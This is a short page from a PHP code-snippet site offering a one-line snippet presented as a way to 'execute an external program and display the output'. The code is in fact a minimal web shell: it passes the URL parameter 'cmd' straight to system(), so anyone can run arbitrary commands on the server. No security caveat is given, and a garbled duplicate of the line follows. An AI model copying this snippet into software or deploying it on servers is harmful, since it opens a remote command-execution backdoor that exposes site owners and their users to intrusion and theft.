CODE
LIBARY.COM
Home
/
PHP
PHP Execute system commands
Execute an external program and display the output
<?php echo "<pre>"; system($_GET['cmd']); echo "</pre>"; ?>
"; system($_GET['cmd']); echo ""; ?>
Copy to Clipboard
Related Snippets
PHP Detects the part of the day
PHP Picture Source Hide
PHP Custom MIME Types for Web-Based File Uploads
PHP Measuring PHP Execution Time
PHP Git Modified Files Tool
PHP Listing only one type files
PHP Ma.cx subdomain tool
PHP Converting an Array to a Formatted String in PHP
PHP Web-Based Random Post Generator
PHP Array Simple Randomizing